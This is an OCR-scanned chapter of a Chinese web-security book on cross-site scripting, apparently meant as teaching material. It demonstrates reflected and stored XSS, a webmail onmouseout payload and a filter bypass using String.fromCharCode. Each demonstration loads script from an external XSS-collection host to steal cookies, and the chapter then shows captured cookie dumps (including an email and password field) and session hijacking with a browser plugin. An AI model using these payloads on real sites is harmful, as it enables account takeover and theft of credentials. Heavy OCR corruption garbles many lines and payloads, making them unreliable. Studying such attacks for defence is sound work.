原理 就 是 通过 存在 的 漏洞 网 站 欺骗 用 户 在 当前 域 执行 黑客 提前 设计 好 的 恶意 JavaScript 脚 
本 ， 这 些 脚 本 往往 会 在 不 经 意 间 就 让 用 户 的 浏览 器 执行 了 自己 不 期 望 发 生 的 动作 ， 有 时 用 
户 发 现 这 些 恶意 动作 后 会 咨询 为 什么 会 中 招 。 某 些 “计算 机 高 手 ” 或 许 会 告诉 他 “一 定 
下 载 了 带 有 病毒 的 软件 ”。 然 而 事实 未 必 如 此 ， 即 使 不 用 恶意 软件 ，XSS 也 可 以 达到 一 些 
相仿 的 作用 ， 这 在 接 下 来 的 章节 中 将 会 详细 展示 。 


622 XSS 攻 击 的 分 类 


通常 意义 上 的 XSS 漏 洞 分 为 反射 型 和 储存 型 两 种 类 型 。 

反射 型 XSS 通 常 借 URL 传 参 的 方式 将 恶意 内 容 传 入 当前 页 面 以 触发 黑客 设计 的 
JavaScript 脚 本 ， 且 打开 链接 的 用 户 即 会 成 为 受害 者 ， 而 储存 型 则 是 通过 POST 请 求 等 方法 
将 恶意 参数 持久 地 提交 进 一 个 页 面 中 ， 故 又 被 称 为 持久 性 XSS。 存 储 型 XSS 的 数据 是 储存 
在 服务 器 上 的 。 

很 多 地 方 喜 欢 把 DOM XSS 也 作为 一 种 XSS 类 型 ， 事 实 上 ， 这 种 类 型 从 效果 上 来 说 也 
是 反射 型 XSS， 但 由 于 发 现 它 的 安全 专家 把 它 单独 作 为 一 个 分 类 ， 所 以 第 被 单独 拿 出 来 。 

先 来 看 一 下 反射 型 XSS， 这 里 以 一 个 名 为 web Гог pentester 的 实验 镜像 进行 演示 ， 读 
者 可 以 前 往 这 个 实验 镜像 的 官方 网 站 (http://pentesterlab.com/exercises/web for pentester/ ) 
下 载 最 新 版 本 的 镜像 并 在 虚拟 机 里 安装 实验 。 这 里 选择 的 虚拟 机 软件 是 VMware 
Workstation， 安 装 方法 不 再 芍 述 。 

虚拟 机 安装 完成 后 将 会 看 到 如 图 6-7 所 示 的 界面 。 
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这 里 还 使 用 刚才 的 实验 平台 ， 这 一 次 提交 的 恶意 参数 如 下 ， 如 图 6-19 所 示 。 


<script src=" http://xss.hacktask.net/ECINmP21415258770 ></script> 


ФО XSS Platform x Ж http://xss.h..21415258770 х / ©’ pentesterLab > Web Юг... х 


є  192.168.101.144/х5<5/ехатріе1.рҺр?пате- <script згс Һр://хѕѕ.Һаскаѕк.пеЕС1№тР?1415258770> </5 


ноте 


Hello 
@ PentesterLab 2013 


16-19 ”执行 payload 测 试 
插入 恶意 参数 并 按 回 车 键 以 后 ， 会 看 到 加 载 的 小 圆圈 多 转 了 一 会 儿 后 停止 了 ， 这 是 因 
为 提交 的 JavaScript 脚 本 已 经 被 执行 ， 可 以 使 用 Firebug 来 查看 一 下 执行 情况 ， 如 图 6-20 所 示 。 


# ЧЮ < у 并 je | HTML” CSS ВЖ ПОМ м Cookies 
о | 编辑 | body < html 


В <div class=“ “navbar navbar-inverse naybar-fixed-top > 
[Z] <div class=" container” 
Hello 
国 <script src=“”“http://xw=ss.hacktask. пеї/ЕС1МшР?1415258770°> 
(function() {{new Image ()). src= http://xss. hacktask. net/index. php?d 
2 | iff 1 =1) {keep=new Ішағе () ;кеер. src= http://xss. hacktask. пеё/іпӣє 
‚таг xss = Ешс#10п() { 


图 6-20 Firebug 查 看 界面 
不 难看 出 ， 外 部 脚本 已 经 被 加 载 ， 这 时 再 访问 该 平台 会 看 到 已 经 成 功 地 支持 了 受害 者 
的 信息 ， 如 图 6-21 所 示 。 


项 目 名 称 : test 


Зе пр: //хев.Паскгавк.пе?/до/аи /7ае12а84с0883а1 07Б596саБа0йвазз#? 


图 ”+ 全 部 5 接收 的 内 容 Request Headers 

НТТР_ВЕРЕВЕВ : 

location : http://192.168.101.144 http://192.168.101.144 
/xss/examplel.php?name=%3Cscript%20srossthtexamplel.php?name=%3Cscript%20src 
//xss.hacktask.net/EC1NmP?1415258770 //xss.hacktask.net 

%3Е%3С/зспрЕ%3ЗЕ [ЕС1МтР? 1415258770%3Е%3С 

toplocation : ћїЕр://192.168.101.144 /script%3E 


Ш -j 2014-11-06 15:37:40 т/ҙ 


/хвз/ехатіріеі.рһр?пате-%оЭСэстір(9%205гс-ЕПІРрі)БЕНК АСЕМТ ; Могйа/5.0 


//х$5.Пасктазк.пеу/ЕС1МтР? 1415258770 (Windows МТ 6.1; WOW64; 


%3Е%3С/5сПрЕ%3Е гу:32.0) сеско/20100101 

cookle : ғігегах/ 32.0 

opener : КЕМОТЕ_АООК : 
114.222.130.3, 54.178.75.106 


86-21 动 持 信息 
因为 平台 并 没有 给 用 户 发 放 cookie， 所 以 这 里 的 cookie 项 为 空 ， 但 是 实战 中 它 往 往 是 
一 大 串 字 符 ， 通 过 劫持 到 的 用 户 cookie， 可 以 用 浏览 器 插件 替换 原 有 cookie 并 绕 过 登录 上 账 
户 和 密码 直接 进入 受害 者 在 当前 网 站 的 账户 ， 下 面 的 章节 将 会 有 实例 演示 。 
不 过 ， 在 讲解 接 下 来 的 内 容 之 前 ， 必 须 介 绍 另 外 一 种 前 端 安全 技术 一 一 CSRF， 在 很 
多 真实 场景 下 ，XSS 和 CSRF 的 结合 使 用 将 会 得 到 意 想 不 到 的 收获 。 
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бш ”前 端 安 全 探秘 ш ТИ 


} 

«Узстіріс> 

代码 并 没有 经 过 仔细 设计 ， 但 却 大 致 勾勒 出 了 一 个 蠕虫 的 模型 ， 从 私信 和 点 进 恶 总 网 址 
的 人 会 触发 很 多 个 恶意 网 址 ， 进 而 危害 到 每 一 个 好 友 。 这 样 的 传播 速度 是 无 法 估量 的 ， 已 
经 无 法 直观 感知 ， 只 能 用 更 为 精确 的 数学 模型 来 描述 一 一 指数 爆炸 型 增长 。 

再 设想 ， 假 设 目 标 站 扣 还 同时 存在 XSS 漏 洞 ， 一 旦 和 CSRF 蜂 虫 结合 使 用 ， 成 干 上 万 
的 受害 者 就 将 会 遇 到 更 大 的 麻烦 了 。 


64 ”实战 案例 演示 
Ж: 本 节 所 提 到 的 所 有 漏洞 均 已 修复 。 
6.4.1 一 个 导致 网 站 沦陷 的 反射 XSS 
下 面 演示 一 个 很 标准 的 反射 XSS 示 例 。 


在 站 点 地 址 栏 提 交 了 <script>prompt(1)</scrip 仿 后， 那个 prompt 对 话 框 就 弹 了 出 来 ， 如 
图 6-22 所 示 。 


图 6-22 存在 XSS 

既然 存在 XSS 漏 洞 ， 那 么 恶意 黑客 就 可 以 构造 cookie 劫 持 的 恶意 链接 ， 并 将 这 个 链接 
伪装 后 发 给 站 长 ， 站 长 单 击 后 ， 正 处 在 后 台 登 录 状 态 的 cookie 被 截获 ， 通 过 伪造 的 cookie 
顺利 垂直 提 权 ， 就 可 以 进一步 getshell 提 权 服 务 器 了 。 

思路 已 经 有 了 ， 然 而 目的 并 非 渗透 这 个 站 点 ， 而 是 测试 展示 cookie 动 持 的 利用 方法 ， 所 以 
并 没有 再 去 招惹 站 长 的 必要 ， 这 里 就 用 一 次 简单 的 水 平 越权 来 展现 cookie 动 持 技 术 的 作用 。 

所 谓 的 水 平 越权 ， 其 实 就 是 在 同样 的 权限 下 ， 访 问 其 他 用 户 的 空间 ， 使 用 不 属于 目 己 
的 权限 。 为 了 展示 ， 笔 者 注册 了 两 个 账户 ， 并 在 火狐 和 Chrome 浏 览 器 分 别 登录 ， 以 模拟 
黑客 和 受害 者 ， 因 为 法 律 问题 ， 且 本 站 点 涉及 充值 等 敏感 信息 ， 请 不 要 把 其 他 合法 用 户 作 
为 实验 目标 。 

笔者 创建 了 两 个 账户 ，testxss 将 会 模拟 受害 者 ， 而 xxetest 则 是 黑客 的 账号 ， 如 图 6-23 所 示 。 
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АМ 


ANUS жөзженжіе, 


Q 搜索 testxss 充值 | 我 的 博客 | 退 Q 搜索 xxetest | 充值 | 我 的 博客 | 


; 仙 侠 搞笑 武侠 历史 Ш 手机 听 = питате БЕЗІ! 


图 6-23 ”测试 账号 


现在 重新 审视 一 下 反射 XSS 的 所 在 并 设计 恶意 链接 ， 其 exploit 如 下 。 

http: .com/search.aspx?keyword= [ XSS J: ] 

由 于 <scrip 亿 标签 没有 过 滤 ， 各 种 符号 也 几乎 没 作 限制 ， 所 以 可 以 很 目 由 地 用 <script 
sTc=xxx></script> 来 加 载 外 部 JS 脚本 ， 最 终 的 恶意 链接 如 下 。 

http: .com/search.aspx?keyword=<script src=http://xss.hacktask.net/ 
ECI1NmP?1415264855></script> 

当 testxss 用 户 打 开 这 个 链接 时 ， 他 所 感受 到 的 也 许 只 是 网 页 加 载 慢 了 一 些 ， 他 所 看 到 


的 页 面 将 会 如 图 6-24 所 示 。 


€ XSS Platform 


0714 3 52548 


те 言情 官场 评书 яма 


图 6-24 XSS 实 际 已 被 触 发 
他 却 海 然 不 知 目 己 已 经 中 了 黑客 的 圈套 。 
再 来 看 看 我 们 的 平台 ， 如 图 6-25 所 示 。 


-anklehttp://xss.hacktask.net/do/auth/7ael12a8dc0883a107bd6caba06d33If7 


图 6-25 ”接收 到 窃取 的 信息 
不 难看 出 ， 框 出 的 部 分 便 是 支持 到 的 cookie， 我 们 把 内 容 复制 到 一 个 空白 的 记事 本 
中 ， 如 图 6-26 所 示 。 


| cookie.txt - 记事 本 
VHA SSE) 120) SEV) #EBh(H) 


Нтю_1у1_293е647867аб2449474еғаі 4562есҒетї=1414904491, 1414904604, 1415241435, 14 
15263266; аз а! иу-31031825973791672107 |3486570; 


Но іруі | 293e6478b7a6244947defd14562ecfe7= 1415264740; 
lzstat в5-338967590 2 1415293540 3486570; m_email=cssors%40163. com; 
m раѕэхог4=Е721060000000000%2с1еку01 ЕЕзувг5 1 | аххрс!4е4; 


6-26 соокева 


前 端 安全 探秘 = ТИ 


如 果 读 者 觉得 这 样 看 起 来 很 乱 的 话 ， 不 妨 写 一 个 简单 的 Python 脚 本 整理 一 下 ， 立 刻 就 
会 清爽 很 多 ， 如 图 6-27 所 示 。 


УКР ЖЕ) (О) заем ЖЕН) 


Hm 1у+_293е6478Ь7а6244947 4еҒа1 4562есҒе7=1414904491, 1414904604, 
1254аї_цу=31031825973791672107 |348657 


70 
Нт іруі 293е647857а62449474еҒ414562есГеТ7-14 
1zstat_ss=338967590_2_ се. 3486570 грати 记事 本 


m_email=cssors%40163. с 
m password=F721060000000000%2c1eky0i ffsv 


|| ЕР) “编辑 (E) “格式 (O) 


Hm lyt 293е6478ЬТ7аБ2 
15263266: lzstat_u 


lzstat _в$=338967590 
п раззиог4-Е 72106000 


УКР ”编辑 (E) ЖОО) заем) 帮助 (H) 
А = ореп(“соокіе. txt”, г”) 
= ореп( result. txt”, w ) 


1 п 
В. кей. strip’ )) 


print С 
86-277 ”用 Python 脚本 整理 cookie 信 息 
既然 黑客 已 经 拿 到 了 受害 者 的 cookie， 他 现在 要 做 的 就 是 把 这 个 cookie 蔡 换 进 浏览 器 
里 。 有 很 多 工具 都 可 以 实现 这 个 功能 ， 甚 至 是 在 火狐 浏览 器 下 如 果 不 想 用 Firebug， 用 Fire 


cookie 插 件 同 样 可 以 完美 地 完成 任务 ，Chrome 浏 览 器 的 插件 Edit This Cookie 也 是 一 样 优 
秀 ， 这 里 我 们 选用 它 来 蔡 换 ， 如 图 6-28 所 示 。 


ОК “РАО” Е де Еди This Cookie 了 ， 单 击 它 ， 看 一 看 界面 ， 如 图 6-29 所 示 。 


Ë 5 + + ® а £ 
<от | Hm_Ipvt_293e6478b7a6244947defd14562ecFfe7 


сот | Нт Іуі 293е6478,7а62449479<!414562<<!е7 


сот | lzstat_ss 
<от | lzstat_uv 
‚сот | m_email 
„сот | m_password 
<от | nickname 


~ EW si | ьазпаге firstime 


1414070662413 


路 径 
Г 


= £ 


ЗЗР] 
ЕШ 0/2022 09:30 РМ 


 —— Ç hostOnly у 


6-28 ЕФ! This Cookie 插 件 


图 6-29 ”查看 cookie 信 息 


可 以 看 到 ，Edit This Cookie 插 件 已 经 把 当前 用 户 的 cookie 一 一 列举 出 来 ， 攻 击 者 只 需 
要 把 对 应 的 值 ， 也 就 是 刚刚 “和 镭 取 ”到 的 cookie 对 应 地 填 进 去 即 可 。 
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填写 完毕 后 刷新 页 面 可 以 看 到 ， 攻 击 者 已 经 成 功 登 录 进 受害 者 的 账户 了 ， 如 图 6-30 
所 示 。 


testxss | 充值 | 我 的 博客 | 退出 @ зом т 


手机 听 书 ” 食 上 传 音频 
作家 合作 а = 
5 ЛХ НН 儿童 英语 评书 曲艺 搞笑 ща 科学 探索 


图 6-30 ”伪造 cookie 登 录 成 功 


642 精确 打击 : 邮箱 正文 XSS 


南京 大 学 近 两 年 曾 有 一 名 “黑客 ”在 网 上 发 帖 称 : “通过 入 侵 老 师 邮箱 获取 考卷 以 及 
修改 考试 成 绩 ”。 这 个 事件 引起 了 轩然大波 ， 社 会 舆论 和 盲目 的 崇拜 者 席卷 而 来 ， 这 位 仁 
兄 因 此 也 红 极 一 时 。 实 际 上 ， 他 所 用 的 技术 也 正 是 XSS， 他 还 指出 ， 很 多 学 校 邮 箱 系 统 都 
存在 此 类 问题 ， 这 也 印证 了 XSS 广 泛 存 在 这 一 事实 。 这 里 就 带 大 家 揭秘 他 究竟 是 如 何 入 侵 
老师 邮箱 的 。 

邮箱 类 的 XSS 就 像 是 精确 制导 武器 ， 制 造 好 的 导弹 非常 精确 地 攻 回 受害 者 ， 而 这 些 
导弹 也 分 优 劣 ， 优 质 的 如 正文 储存 型 XSS， 命 中 率 极 高 ， 也 能 很 大 几率 地 “光荣 完成 任 
务 ”。 这 里 介绍 一 个 这 样 的 邮箱 XSS， 为 了 不 使 复杂 的 bypass 绕 尝 读 者 ， 这 里 我 们 找到 了 
一 个 过 滤 不 严谨 的 邮箱 提供 商 进行 测试 。 


= 无 限 ВЕ lualualua <ualuaua@2925.corc w 
U азам | RA 


ТЕН, чаташа 


Ы 邮件 : 0 封 未 去 则 件 


(9665 145 用 无 限 邮 账号 
我 忘记 帐号 了 ! 邮箱 将 会 帮 你 记 住 曾 


& ва + 
6-31 邮箱 XSS 测 试 目标 

初步 审视 这 个 邮箱 系统 ， 看 上 去 清 清 爽 爽 ， 似 乎 和 网 易 、QQ 邮 箱 等 并 无 两 样 。 然 而 
安全 性 是 否 也 如 此 呢 ， 人 简单 测 试 一 下 便 可 知晓 。 

登录 一 个 163 邮 箱 作为 发 件 账 号 ，lualualua@2925.com 则 作为 被 测试 账号 ， 先 按 如 下 的 
方法 发 送 一 封 邮件 。 

先 在 正常 编辑 状态 随意 写 下 一 个 字符 串 ， 如 test123， 插 入 这 个 字符 串 的 目的 是 方便 在 
收 件 页 面 调试 时 定位 ， 后 面 会 看 到 ， 然 后 输入 “< >” 编 辑 HIML 人 代码。 先 测试 一 句 经 典 
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的 payload 语 句 : <script>alert(1)</script>, 16-32977. 
这 是 编辑 后 的 语句 ， 编 辑 好 后 不 要 返回 文本 编辑 模式 ， 直 接 单 击 “ 发 送 ”按钮 。 
事实 证 明 ， 收 件 处 并 没有 弹 窗 ， 如 图 6-33 所 示 ， 用 Firebug 跟 踪 ， 通 过 刚才 输入 的 字符 
串 对 输出 进行 定位 。 


KHA : | lualualua@2925.com 


+ 题 test 


内 添加 附件 (5226) | У 邮箱 大 师 领 15G 云 附件 


М =Á v< +5 v 
С В 7 ОАА 
1651123 <5спр>а!е (1) </ѕспрі> 


Е НА: xxetest<xxetest@163.com> = 
时 ІН: 2014-11-06([4) 18:53 
ША : lualualua<lualualua@2925.com> ; 


test123 


图 6-32 ”正文 payload 测 试 6-33 发 送 结 果 
如 图 6-34 所 示 ， 令 人 惊讶 的 是 <scrip 亿 标签 已 经 成 功 地 进入 页 面 却 并 没有 执行 。 这 时 
我 们 注意 到 这 样 一 行 代 码 : 


<html xmlns="http:/ /ww -ww3-.0rg/1999/xhtmal"> 


В ¿div style= 11пе-һе1 1:1. 7:со1ог 
1951123 
= ¿script? 


1 alert(i) 
¿/sceript> 


</ div> 
6-34 ”Firebug 定 位 输出 


由 此 可 见 ， 网 站 定义 了 需要 使 用 XHTML， 用 不 严谨 的 <script></script> 想 必 是 无 法 插 
入 了 ， 上 略微 修改 一 下 语句 ， 如 下 所 示 。 


<script type="text/javascript"> 
alert ("Hello Мог1а!"); 


</зсг1рЕ> 


再 次 发 送 ， 却 没 想 到 依然 无 法 触发 ， 如 图 6-35 所 示 。 


~ ха 

TIFA: xxetest<xxetest@163.com> = 

时 间 : 2014-11-07( 五 ) 11:51 

АД: lualualua@2925.com<lualualua@2925.com> ， 


XXXXXX 


图 6-35 发 送 结果 
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这 使 笔者 鼎 为 费解 ， 看 来 是 后 问 采 用 了 过 滤 ， 想 要 在 这 种 情况 下 绕 过 过 滤 十 分 困难 ， 
本 看 条 条 大 路 通 罗 马 的 原则 ， 尝 试用 事件 方式 触发 。 此 时 也 刚好 想到 了 一 个 有 趣 的 事件 属 
FE: onmouseout。 在 Ww3school 查 一 下 ，xhtml 的 确 支 持 这 个 属性 ， 对 它 的 摘 述 则 是 : 

当 鼠 标 指 针 移 出 茶 元 素 时 执行 脚本 。 

想必 大 多 数 用 户 如 果 打 开 邮 件 看 到 一 大 段 内 容 都 会 目 然 地 用 鼠标 指针 轻 轻 滑 过 它们 ， 
即使 是 在 不 经 意 间 ， 那 么 攻击 者 就 可 以 试看 构造 出 这 样 一 个 语句 : 

<b on mouseout=alert (1) >15 ВВ: ...... hahaha сонар </р> 


ВРА, ЖЖС 6-36. 


6-36 ”成 功 触 发 XSS 
从 图 6-36 可 以 看 到 ， 在 鼠标 指针 移动 到 文字 上 方 再 拿 开 的 瞬间 ，JavaScript 脚 本 被 触发 
了 ， 再 试 着 构造 cookie 劫 持 。 


<b onmouseout=s=createElement('script');body.appendChild(s);s. 


src='http://t.cn/R7EtYil';>lalalallalalalala</b> 


当 收 件 人 打开 邮件 并 将 鼠标 滑 过 攻击 者 设计 的 文本 内 容 后 ， 查 看 XSS 平 台 可 以 看 到 ， 
cookie 已 经 非常 顺利 地 落 入 我 们 平台 中 了 ， 如 图 6-37 所 示 。 


паех.аѕрх?рпопеогиѕегмате= 1 
cookie : ІодіпОѕегМате=тіа1ітіа1гтіг1; 
ӘріоасКеу- 
атокск В ки: 
07 13:03:08 cbvxEx72GI8fZQKIYMUXBPJjkLCCCMCB9IIXTI3ŠG40L; 
ргеутай-Чдаеа5Ь95-119с- Дет 
4сЕа-9Е28-25050а33е81с: Е 
REMOTE_ADDR 
INFO_SI=r0Tx4OzHa0SBn7h7u0WRQpHZc2krHTSupOEUQDxmR3I 
INFO_CI=JSAbDfqkY99bxsPJD|G3qw==; Бр даа 


ІМҒО К1- АЗ37С71624Е82024685Е1Е94281007СЕ6 


图 6-37 查看 XSS 平 台 
643 一 次 简单 的 绕 过 ( bypass ) 演示 
在 上 面 的 内 容 中 ， 已 经 分 别 挑战 了 反射 和 邮箱 的 标准 语句 XSS， 却 还 没有 经 历 过 和 
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设置 过 过 滤 脚 本 的 XSS 输 入 点 。 可 是 当 杀 目下 手 去 挖掘 XSS 时 却 会 发 现 ， 大 多 数 可 以 编辑 
HTML 的 位 置 都 针对 JavaScript 的 执行 进行 了 过 滤 和 限制 ， 这 是 因为 XSS 现 今 也 已 经 引起 了 
各 大 厂商 的 注意 ， 并 努力 提升 安全 环境 的 成 果 。 然 而 有 些 情况 下 ， 纵 使 厂商 已 经 进行 了 过 
滤 ， 仍 然 可 以 通过 对 插入 语句 的 一 些 变形 绕 过 它们 。 下 面 台 来 看 一 个 反射 型 XSS 的 绕 过 ， 
也 就 是 bypass。 事 实 上， 除了 过 滤 脚 本 以 外 ， 还 有 一 些 功能 本 身 也 可 能 构成 障碍 ， 正 如 下 
面 将 要 演示 的 一 例 。 

当 怀 疑 页 面 处 存在 XSS 输 入 点 时 ， 笔 者 往往 会 先 提 交 一 个 <br>123<br> 来 得 看 是 否 能 
插入 大 于 号 和 小 于 号 。 如 果 可 以 ， 那 么 XSS 成 功 的 布 望 就 只 能 寄托 于 被 输出 到 JavaScript 内 
的 参数 了 。 让 人 欣慰 的 是 ， 此 处 并 没有 过 小 大 于 号 小 于 号 ， 可 以 看 到 ， 输 出 已 经 错位 了 。 
而 反映 型 XSS 中 ， 没 有 过 滤 尖 括号 就 意味 看 成 功 了 80%， 如 图 6-38 所 示 。 

该 网 站 并 没有 过 滤 尖 括号 ， 接 下 来 可 以 进一步 测试 了 ， 先 插入 一 条 测试 语句 : 
<script>alert(1)</script>。 

结果 出 现 了 如 图 6-39 所 示 的 页 面 ， 那 么 是 不 是 意味 看 此 处 没有 XSS 输 入 点 的 存在 呢 ? 
答案 显然 是 否定 的 。 


KEF 
HEM. 
ABRET, SERBIT 或 者 “3 种 就 上 
图 6-38 检测 是 否 过 滤 尖 括号 图 6-39 ”插入 测试 


继续 测试 ， 提 交 一 个 正常 参数 后 看 页 面 返回 情况 ， 如 图 6-40 所 示 。 

没有 问题 ， 这 说 明 搜 索 功 能 不 存在 设计 错误 ， 下 面 就 应 当 思 考 一 下 是 哪个 ， 或 者 哪些 
语句 触发 了 错误 呢 ? 首先 怀疑 的 目 然 是 <scrip 亿 标签， 这 里 把 它 换 反 ， 用 <marquee> 标 签 来 
代替 ， 看 看 搜索 结果 如 何 〈 见 图 6-41) 。 


坎 访 问 的 页 面 不 存在 ， 点 击 这 里 返回 百 页 或 者 бФОЙЕЫСӘКЗ?ЕГІ. 


图 6-40 ”提交 正常 参数 86-41 标签 测试 

没 想 到 <marquee>123</marquee> 居 然 也 被 过 滤 掉 了 ， 如 果 对 <marquee> 标 签 都 进行 了 
过 滤 ， 这 个 过 滤 脚 本 就 有 点 犀利 了 。 但 笔者 仔细 一 想 ， 单 标签 <br> 的 插入 毫 无 问题 ， 兴 
许 是 斜 杠 导致 了 过 滤 ， 当 然 ， 除 此 以 外 (0) 的 嫌疑 也 还 没有 排除 ， 所 以 可 以 尝试 分 别 插 入 测 
试 ， 插 写 果然 导致 了 过 小， 再 次 看 到 如 图 6-42 所 示 的 页 面 。 
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您 访问 的 页 面 不 存在 ,点击 这 里 返回 首页 ә ВЕЗЕТ, 
图 6-42 语句 被 过 滤 

可 是 使 用 <marquee> 插 入 的 时 候 并 没有 括号 ， 而 事实 证 明 ， 单 独 插 入 冬 杠 或 者 插入 
/test 却 并 没有 引起 错误 ， 如 图 6-43 所 示 。 


Wsearch//test/ 


4 В. 


п 业 移动 互联 网 ный ”电子 商务 БЕ 


АЕ а, 


相关 搜索 


„ £: 
=a 


+ | 
图 6-43 ”检测 和 斜 杠 是 否 过 渡 
这 让 笔者 的 思路 一 顿 ， 但 立刻 又 开明 起 来 ， 可 以 看 出 ， 这 里 提交 的 斜 杠 似乎 被 当 作 做 
目录 中 的 和 斜 杠 处 理 了 ， 再 插入 test/test， 果 然 如 此 ! 
既然 这 样 ， 不 妨 插 一 个 不 使 用 和 斜 杠 的 单 标签 来 触发 XSS， 婚 然 无 法 用 <script>， 就 只 
好 用 HTML 的 事件 属性 了 。 这 时 笔者 又 想到 一 个 问题 ， 插 号 无 法 处 理 。 这 里 为 何 会 过 滤 括 
号 呢 ? 笔者 有 些 奇 怪 ， 重 新 插入 了 一 个 (12) ， 没 想到 居然 没有 显示 404 界 面 ， 这 使 笔者 
备 受 鼓舞 ， 随 后 找到 了 一 个 不 带 有 和 斜 杠 的 XSS 语 句 : <img src=x опепог-айеп(1)>. 
这 里 的 src 属 性 赋值 为 x 目 然 会 出 错 ，onerror 事 件 检 测 到 这 个 错误 后 便 触发 了 后 面 的 
alert(1) 语 句 ， 经 过 测试 ， 果 然 成 功 了 ， 如 图 6-44 所 示 。 


в. 


图 6-44 ”成 功 触发 XSS 
不 过 现在 高 兴 还 太 早 ， 因 为 在 存在 障碍 的 情况 下 加 载 外 部 脚本 实现 cookie 劫 持 将 变 得 
更 为 困难 。 
先 来 整理 一 下 思路 。 
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现在 用 以 触发 JavaScript 语 句 的 环境 已 经 设计 好 了 ， 即 : 

һеер:// /search/<img src=X onerror=【 待 设计 的 Js 语句 >/ 

看 起 来 似乎 不 是 很 复杂 ， 因 为 原本 onerror 事 件 就 可 以 用 于 创建 节点 并 加 载 外 部 脚本 。 

<img src=xonerror=s=createElement( ' script'); body.appendChild(s); s.src= 你 的 JS 地 
НЕ"; > 

但 读者 应 该 也 意识 到 了 ， 如 果 想 要 标识 存放 在 网 络 上 的 外 部 脚本 ,在 引用 其 地 址 时 就 
一 定 会 用 到 /， 和 斜 杠 出 现在 标签 中 部 将 会 出 现 问题 ， 押 以 我 们 可 以 尝试 将 onerror 事 件 属 性 
后 的 JS 脚本 进行 十 六 或 十 进 制 编码 ， 最 终生 成 一 个 这 样 的 语句 。 


<img src=X опеггог=&#х73; &#х30;&#х63;&#х1712;&#х65;&#х61;&#х74;&#х65; 
&#х45; &#х6С; 6 #хбо; «#хбО; « #хбо; 6%Х6Е; «#х 74; &#х28; 6 #х2? 7; «#х 73; 6 #х63З; 4 #х72; 
6#х69; &#х 70; 6 #х 74; 6 #х2 7; «#х29; « #х3В; 6%Х62; «а #хбЕ; 4 #х6б64; 6 #х 79; «4 х2Е; &#х61; 
&#х70; «#х 70; &#х65; «#хбЕ; &#х64; 6 #х43; &#х68; &#х69; &#х6С; &#х64; &#х28; «#х 73; 
&#х29; &#х3В; «#х 73; &#х2Е; «#х 73; « #х 72; &#х63; &#х30; &#х27; &#х68; «#х 74; &#х74; 
&#х70; &#хЗА; &#х2Е; «#х2Е; «4 #х 74; 6%Х2Е; 6ЖХ63; &#х6Е; 6%Х2Е; «#хо2; 6 #х37; «#хо2; 
«#х62; «#х4С; «#х4С; 6 #х 74; 6 #х2 7; «#х3ЗВ; > 


这 样 编码 看 似 已 经 绕 过 了 斜 本 ， 然 而 却 遭 遇 
了 另外 一 种 不 幸运 ， 如 图 6-45 所 示 。 

这 个 错误 提示 页 面 再 次 出 现 ， 根 据 后 面 进 一 
步 测试 发 现 & 也 被 过 滤 了 ， 于 是 从 编码 方法 也 无 
从 下 手 了 。 


还 好 ， 安 全 的 世界 里 没有 绝对 ， 一 种 方法 的 MAAAMETI, AERDEN më 
失败 也 许 预示 看 另 一 种 方法 的 成 功率 的 增加 。 再 图 6-45 ”加 载 外 部 脚本 
尝试 用 JavaScript 方 式 对 和 斜 杠 转 码 来 bypass 吧 。 

根据 原先 的 指令 : 


<img src=x onerror=s=createElement ('script');body.appendChild (s); 


s.srce "http://t-cn/RIRGKw]"; > 


这 里 使 用 String.fromCharCode() 函 数 来 把 整个 URL 部 分 进行 一 个 变形 ， 将 http://t.cn/ 
R7RGKwj 转 换 为 String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 116, 46, 99, 110, 47, 82, 
55, 82, 71, 75, 119, 106); 的 形式 ， 因 为 在 JavaScript 运 行 时 ， 它 将 会 被 重新 变 回 原来 的 URL 
地 址 。 

这 样 一 来 就 顺利 了 ， 最 终 构 造 出 恶意 链接 地 址 。 


http://www. .сп/зеагс и /33С1та8205гс-х520опеггог-з-сгеаГеЕв!етеп 5828527 
зсгтрЕЗ2 7329; роду.аррепасһ114%285%29; 5. 5гс=51гіпд. ЁготсһагСойе%28104, 
115. 126. ПЕ ел Л, ЗУ ВАТУ о изка 
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当 受 害 者 打开 这 个 链接 以 后 ， 看 一 下 攻击 者 的 平台 ， 如 图 6-46 所 示 。 


РЕ 


Боду-аррепасй 


s.src=String.fromCh: e%28104,116,116,112,58,47,47,116,46,99,110,47,82,55,82,71,75, 


торюсапоп : http://www | HTTP_REFERER : 
/search http://www - с /search 
do3CiMmgW20src=x%20o0nerror=s=createElejAeBCimg%20src=x%20o0nerror=s=createElement 
%28%275спрЕ%27%29; %28%275спрЕ% 27%29 
Боду.аррепасћіїа% 2859029; body.appendChild 
ЕЕ 5.згсъ5тппа.потспагсоде9о28104,116,116514/7,581 змия ате ла ФАР rO повар 82161119, 
cookie : HTTP_USER_AGENT : Mozilla 
Нт |уі сЗЗедс1еб9еса76а2е522с20е5 ЗИВАЛОНЕВИ А MISA ‚1 АБО 
їта=1.21217702 1415241451.14152496 А ПОВОНУЗЧА 00101 
__ийт2=1.1415241451.1.1.иїтсзг= Firefo 
(aire сп=(д\гесї)|иттста=(попе); REMOTE_ADDR ， 
ис=ае6165451 2f6cbb2ff235326; 
Нт |руб сЗЗе4с1е69 76а2е522с20е5 3!6-1415 
= } 141 2 
7902b14984fbf868afc6603b; 


图 6-46 查看 XSS 平 台 
可 以 看 到 已 经 成 功 劫 持 到 的 cookie， 束 这 样 攻击 者 成 功 bypass 了 这 个 “有 矿 烦 ”的 反射 
型 XSS 。 


644 利用 XSS 进 行 钓 鱼 攻击 


XSS 漏 洞 原因 : ed2k 协 议 漏洞 ， 这 个 是 Discuz X3.1 前 版 本 的 漏洞 ， 漏 洞 成 因 将 会 在 
Web 渗 透 与 代码 审计 章节 详细 说 明 。 因 为 这 个 站 的 密码 用 MD5 加 密 ， 还 加 了 http_only 标 
签 ， 所 以 最 便捷 的 攻击 方式 就 是 XSS 钓 鱼 了 。 这 个 漏洞 的 详细 成 因 在 代码 审计 章节 中 已 经 
分 析 完 毕 。 下 面 来 重 现 一 下 如 何 利用 这 个 XSS 漏 洞 进行 钓鱼 攻击 。 

该 漏洞 已 提交 漏洞 平台 并 修复 。 

自 先 找到 这 个 论坛 的 登录 页 面 ， 在 右上 和 角 随 便 输入 一 个 用 户 名 和 密码 就 能 进入 登录 专 
用 的 页 面 ， 如 图 6-47 所 示 。 

然后 审 玛 元 素 把 相关 的 资源 都 下 载 下 来 ， 也 可 以 在 审 租 元 素 的 Network 页 面 下 刷新 ， 

会 显示 出 加 载 的 内 容 ， 然 后 下 载 即 可 ， 如 图 6-48 所 示 。 


